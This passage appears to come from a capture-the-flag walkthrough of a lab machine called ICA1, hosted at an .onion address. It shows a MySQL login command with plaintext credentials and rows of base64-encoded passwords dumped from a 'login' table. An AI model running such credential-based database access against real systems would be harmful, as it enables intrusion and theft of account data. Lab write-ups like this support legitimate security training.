http://r2km7u25qebaefa7b6jdcjldymc2u337vzpx7ne773ypgs3qlq4xycqd.onion/index.php?page=ICA1
Database Access Using the discovered credentials, I established a connection to the MySQL database: $ mysql -h [TARGET_IP] -u qdpmadmin -p'UcVQCMQk2STVeS6J' --ssl=0 qdpm Within the database, I found interesting tables containing user information and encoded passwords: -- From 'login' table
(1,2,'c3VSSkFkR3dMcDhkeTNyRg=='),
(2,4,'N1p3VjRxdGc0MmNtVVhHWA=='),
(3,1,'WDdNUWtQM1cyOWZld0hkQw=='),
(4,3,'REpjZVZ5OThXMjhZN3dMZw=='),
(5,5,'Y3FObkJXQ0J5UzJEdUpTeQ==')
-- From 'user'...